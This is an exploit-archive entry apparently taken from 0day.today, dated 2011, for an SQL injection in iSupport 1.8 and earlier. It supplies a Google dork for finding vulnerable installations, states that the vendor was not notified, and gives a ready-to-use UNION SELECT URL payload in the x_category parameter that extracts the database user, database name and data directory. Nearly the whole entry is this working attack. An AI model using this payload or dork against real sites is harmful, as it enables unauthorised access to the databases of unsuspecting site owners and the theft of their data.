id: 16384
date: 06/23/2011
title: iSupport 1.8 SQL Injection Vulnerability
author: Brendan Coles
cves: 

# Date: 2011-06-23
# Author: Brendan Coles bcoles@gmail.com
# Software: iSupport
# Version: <= 1.8
# Homepage: http://www.idevspot.com/iSupport.php
# Google Dork: "Powered by [ iSupport 1.8 ]"
 
# Vendor: idevSpot
# Homepage: http://www.idevspot.com/
# Notified: Unnotified
 
# SQL Injection:
 
http://localhost/[PATH]/index.php?include_file=knowledgebase_list.php&x_category=null union select null,concat(user(),0x3a,database(),0x3a,@@datadir),null,null,null,null--



#  0day.today [2023-03-25]  #